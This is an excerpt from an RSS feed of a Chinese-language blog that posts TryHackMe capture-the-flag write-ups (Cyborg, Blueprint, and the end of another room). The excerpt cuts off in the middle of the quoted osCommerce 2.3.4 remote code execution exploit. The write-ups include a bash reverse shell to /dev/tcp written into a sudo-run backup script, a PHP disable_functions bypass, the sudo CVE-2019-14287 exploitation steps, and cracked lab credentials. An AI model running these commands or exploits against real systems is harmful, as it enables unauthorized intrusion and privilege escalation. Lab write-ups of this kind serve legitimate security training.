&lt;li&gt;&lt;code&gt;steghide extract -sf cute-alien.jpg&lt;/code&gt;並搭配 &lt;code&gt;Area51&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/eac4d-XNbSHRD.png"&gt;- 發現成功的解出了 &lt;code&gt;message.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b1d32-uIkrnoy.png"&gt;我們可以發現文章內- 使用者 : &lt;code&gt;james&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;密碼 : &lt;code&gt;hackerrules!&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ssh"&gt;SSH&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;透過 SSH 進行登入&lt;code&gt;ssh james@10.10.119.64&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3fb46-kQnYXHF.png"&gt;尋找到 &lt;code&gt;user_flag.txt&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/475cc-Hbe1LbA.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;b03d975e8c92a7c04146cfa7a5a313c7&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;輸入 &lt;code&gt;sudo -l&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/217b5-MxoRJ33.png"&gt;&lt;/li&gt;
&lt;li&gt;所以我們不能以 root 身分執行&lt;code&gt;/bin/bash&lt;/code&gt;What is the incident of the photo called?- 裡面還找到了一張照片&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c7d36-aAqWceo.png"&gt;&lt;/li&gt;
&lt;li&gt;透過 Google 以圖搜圖可以找到&lt;a href="https://www.foxnews.com/science/filmmaker-reveals-how-he-faked-infamous-roswell-alien-autopsy-footage-in-a-london-apartment"&gt;這篇&lt;/a&gt;新聞&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Roswell alien autopsy&lt;/code&gt;繼續提權- 透過 scp 上傳 Linpeas本機&lt;code&gt;scp linpeas.sh james@10.10.119.64:/tmp&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e1e19-0xkBXzm.png"&gt;遠端- &lt;code&gt;bash linpeas.sh | tee meow.txt&lt;/code&gt;可以觀察到 Linpeas 把 sudo 版本變紅色- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cb1d7-zpru0me.png"&gt;&lt;/li&gt;
&lt;li&gt;透過Google &lt;code&gt;Sudo 1.8.21p2&lt;/code&gt;可以找到 &lt;code&gt;CVE-2019-14287&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.exploit-db.com/exploits/47502"&gt;https://www.exploit-db.com/exploits/47502&lt;/a&gt;遠端機器剛好有 python 跟 vim- 那就直接開 vim 把 exploit 給貼上&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/93c78-uDhuoI0.png"&gt;把 python exploit code 給 run 起來- 詢問使用者名稱，就輸入 &lt;code&gt;james&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/69e46-DUiJN5U.png"&gt;&lt;/li&gt;
&lt;li&gt;成功提權!取得 root flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b80d0-n85MNfD.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;b53a02f55b57d4439e3341834d70c062&lt;/code&gt;(Bonus) Who is Agent R?- 信最後 有寫 &lt;code&gt;DesKel&lt;/code&gt; aka Agent R&lt;/li&gt;
&lt;li&gt;阿不是阿，你名字裡哪裡有 R ㄌ ?__?&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Cyborg (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/07/29/cyborg-try-hack-me-writeup/</link><pubDate>Thu, 29 Jul 2021 23:58:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/07/29/cyborg-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/cyborgt8"&gt;https://tryhackme.com/room/cyborgt8&lt;/a&gt;&lt;br&gt;
IP : 10.10.210.57&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;老梗 &lt;code&gt;nmap -A 10.10.210.5&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/79c45-FxeAXB1.png"&gt;Scan the machine, how many ports are open?- &lt;code&gt;2&lt;/code&gt;What service is running on port 22?- &lt;code&gt;SSH&lt;/code&gt;What service is running on port 80?- &lt;code&gt;HTTP``python3 dirsearch.py -u http://10.10.210.57/ -e all&lt;/code&gt;- &lt;code&gt;/admin/&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/etc/&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="解密"&gt;解密&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;先從 &lt;code&gt;/etc/&lt;/code&gt; 路徑開始看裡面有啥http://10.10.210.57/etc&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/eed59-ViOQB9W.png"&gt;找到路徑底下有一個 &lt;code&gt;passwd&lt;/code&gt;- http://10.10.210.57/etc/squid/passwd&lt;code&gt;music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;看起來是 hash 格式，直接複製出來給約翰&lt;/li&gt;
&lt;li&gt;&lt;code&gt;john a.txt --wordlist=/opt/rockyou&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/631b7-WZB1ZHG.png"&gt;帳號 : &lt;code&gt;music_archive&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;密碼 : &lt;code&gt;squidward&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="尋寶"&gt;尋寶&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;去逛 &lt;code&gt;/admin/&lt;/code&gt;發現有 Archive 可以下載&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9fc37-FnMkdhB.png"&gt;解開之後發現是一種奇怪格式- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3370f-i3bMeZ8.png"&gt;&lt;/li&gt;
&lt;li&gt;檔案都是 binary 無法 print&lt;/li&gt;
&lt;li&gt;Readme 提醒我們可以去看 &lt;a href="https://borgbackup.readthedocs.io/"&gt;https://borgbackup.readthedocs.io/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;borg 是一種備份程式嘗試簡單的看完說明後- &lt;code&gt;borg list .&lt;/code&gt;輸入密碼，剛剛約翰破出來的 &lt;code&gt;squidward&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;可以看到一些資訊&lt;code&gt;borg mount . ../a&lt;/code&gt;- 把檔案掛載起來&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3cfbf-eGdSZbu.png"&gt;發現掛載的檔案裡面有 note- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ba8bb-YSBGSvx.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;alex:S3cretP@s3&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;看起來就很像帳密&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="進入系統"&gt;進入系統&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;用 ssh 搭配帳密登入&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/42c22-Cz2cN5e.png"&gt;&lt;/li&gt;
&lt;li&gt;取得 user flag&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6f94e-7b23Lda.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}&lt;/code&gt;嘗試提權- 先用 sudo -l 看我們有什麼權限&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8c497-FYjU6oy.png"&gt;&lt;/li&gt;
&lt;li&gt;發現我們可以用 &lt;code&gt;sudo&lt;/code&gt; 執行 &lt;code&gt;/etc/mp3backups/backup.sh&lt;/code&gt;觀察權限- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3dcec-9rlPjU5.png"&gt;&lt;/li&gt;
&lt;li&gt;發現我們是這個檔案的擁有者，但我們不能修改他&lt;/li&gt;
&lt;li&gt;不過可以透過 &lt;code&gt;chmod +w&lt;/code&gt; 新增 Write 權限插入 shell- &lt;code&gt;echo &amp;quot;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.13.21.55/7877 0&amp;gt;&amp;amp;1'&amp;quot; &amp;gt;&amp;gt; /etc/mp3backups/backup.sh&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;直接用 reverse shell 插入檔案最下方執行 shell- 攻擊機開啟監聽&lt;code&gt;nc -vlk 7877&lt;/code&gt;被駭機用 sudo 執行該檔案- &lt;code&gt;sudo /etc/mp3backups/backup.sh&lt;/code&gt;拿到 root shell!- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3e35c-xEM5R4U.png"&gt;貓根旗幟- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c3edb-KW4V2yi.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Blueprint (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/07/29/blueprint-try-hack-me-writeup/</link><pubDate>Thu, 29 Jul 2021 23:55:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/07/29/blueprint-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/blueprint"&gt;https://tryhackme.com/room/blueprint&lt;/a&gt;&lt;br&gt;
IP : 10.10.66.7&lt;/p&gt;
&lt;h2 id="scan"&gt;Scan&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;一樣老梗 &lt;code&gt;nmap -A 10.10.66.7&lt;/code&gt; 發現開了很多 port&lt;/li&gt;
&lt;li&gt;80 port 進去是 404先放一邊&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;└─$ nmap -A 10.10.66.7
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-29 03:57 EDT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Nmap scan report for 10.10.66.7
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Host is up (0.32s latency).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Not shown: 984 closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;PORT STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;80/tcp open http Microsoft IIS httpd 7.5
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| http-methods:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ Potentially risky methods: TRACE
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-server-header: Microsoft-IIS/7.5
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-title: 404 - File or directory not found.
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;135/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;139/tcp open netbios-ssn Microsoft Windows netbios-ssn
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-title: Bad request!
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| ssl-cert: Subject: commonName=localhost
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Not valid before: 2009-11-10T23:48:47
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_Not valid after: 2019-11-08T23:48:47
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ssl-date: TLS randomness does not represent time
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| tls-alpn:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ http/1.1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;445/tcp open microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;1165/tcp filtered qsm-gui
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;1971/tcp filtered netop-school
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;3306/tcp open mysql MariaDB (unauthorized)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;5190/tcp filtered aol
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| http-methods:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ Potentially risky methods: TRACE
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-title: Index of /
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49152/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49153/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49154/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49158/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49159/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;49160/tcp open msrpc Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Host script results:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_clock-skew: mean: -20m00s, deviation: 34m36s, median: -1s
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: , NetBIOS MAC: 02:24:bb:82:08:6f (unknown)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb-os-discovery:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| OS CPE: cpe:/o:microsoft:windows_7::sp1
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Computer name: BLUEPRINT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| NetBIOS computer name: BLUEPRINT\x00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| Workgroup: WORKGROUP\x00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ System time: 2021-07-29T08:58:58+01:00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb-security-mode:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| account_used: guest
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| authentication_level: user
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| challenge_response: supported
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ message_signing: disabled (dangerous, but default)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb2-security-mode:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| 2.02:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ Message signing enabled but not required
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| smb2-time:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| date: 2021-07-29T07:58:57
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ start_date: 2021-07-29T07:49:40
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Nmap done: 1 IP address (1 host up) scanned in 131.87 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;測試老洞445 port SMB 有開，又是 Windows 系統很直覺的掃一下老洞 MS17-010&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/3ndG4me/AutoBlue-MS17-010"&gt;https://github.com/3ndG4me/AutoBlue-MS17-010&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/28994-vVpzLMe.png"&gt;&lt;/li&gt;
&lt;li&gt;發現打不進去 QQ觀察 web- 發現 8080 port 跟 443 port 的 web server 都指向同一個 web server&lt;/li&gt;
&lt;li&gt;裡面有一個 &lt;code&gt;oscommerce-2.3.4&lt;/code&gt; 路徑&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4143e-ME9VmfO.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="exploit"&gt;Exploit&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;尋找 exploitGoogle &lt;code&gt;oscommerce-2.3.4 Exploit&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.exploit-db.com/exploits/44374"&gt;https://www.exploit-db.com/exploits/44374&lt;/a&gt;部屬 exploit- wget &lt;a href="https://www.exploit-db.com/download/44374"&gt;https://www.exploit-db.com/download/44374&lt;/a&gt; -O 44374.py&lt;/li&gt;
&lt;li&gt;修改路徑&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; base_url &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#34;http://10.10.66.7:8080/oscommerce-2.3.4/catalog/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; target_url &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#34;http://10.10.66.7:8080/oscommerce-2.3.4/catalog/install/install.php?step=4&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;修改指令&lt;code&gt;payload += 'system(&amp;quot;whoami&amp;quot;);'&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;接著執行 &lt;code&gt;44374.py&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/807a7-A1brcVL.png"&gt;&lt;/li&gt;
&lt;li&gt;發現禁止 &lt;code&gt;system&lt;/code&gt;嘗試 &lt;code&gt;phpinfo()&lt;/code&gt;- 發現 &lt;code&gt;disable_functions&lt;/code&gt; 只有禁止 &lt;code&gt;system&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d41fa-z9Ln4KP.png"&gt;&lt;/li&gt;
&lt;li&gt;這邊有非常多種繞過方法，例如passthru&lt;/li&gt;
&lt;li&gt;shell_exec&lt;/li&gt;
&lt;li&gt;exec在此取用 &lt;code&gt;passthru&lt;/code&gt;再次嘗試 payload- &lt;code&gt;payload += 'passthru(&amp;quot;whoami&amp;quot;);'&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b7fea-8eH0aD5.png"&gt;&lt;/li&gt;
&lt;li&gt;發現他直接吐了一個 system 給我!!準備戳 reverse shell- 找到一個 php windows reverse shellhttps://github.com/Dhayalanb/windows-php-reverse-shell/blob/master/Reverse%20Shell.php&lt;/li&gt;
&lt;li&gt;基本上他的原理是寫檔，把base64轉成一隻exe跑起reverse shell拿來微調一下修改 &lt;code&gt;ip&lt;/code&gt;、&lt;code&gt;port&lt;/code&gt;、然後把 &lt;code&gt;system&lt;/code&gt; 改 &lt;code&gt;passthru&lt;/code&gt;放進 &lt;code&gt;44374.py&lt;/code&gt;完整 exploit code&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# Date: 29.0.3.2018&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# Exploit Author: Simon Scannell - https://scannell-infosec.net &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# Tested on: Linux, Windows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# execute the &amp;#34;install_4.php&amp;#34; script, which will create the config file for the installation. It is possible to inject&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# PHP code into the config file and then simply executing the code by opening it.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff79c6"&gt;import&lt;/span&gt; requests
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;base_url &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#34;http://10.10.66.7:8080/oscommerce-2.3.4/catalog/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;target_url &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#34;http://10.10.66.7:8080/oscommerce-2.3.4/catalog/install/install.php?step=4&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;DIR_FS_DOCUMENT_ROOT&amp;#39;&lt;/span&gt;: &lt;span style="color:#f1fa8c"&gt;&amp;#39;./&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# the payload will be injected into the configuration file via this code&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# &amp;#39; define(\&amp;#39;DB_DATABASE\&amp;#39;, \&amp;#39;&amp;#39; . trim($HTTP_POST_VARS[&amp;#39;DB_DATABASE&amp;#39;]) . &amp;#39;\&amp;#39;);&amp;#39; . &amp;#34;\n&amp;#34; .&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6272a4"&gt;# so the format for the exploit will be: &amp;#39;); PAYLOAD; /*&lt;/span&gt;
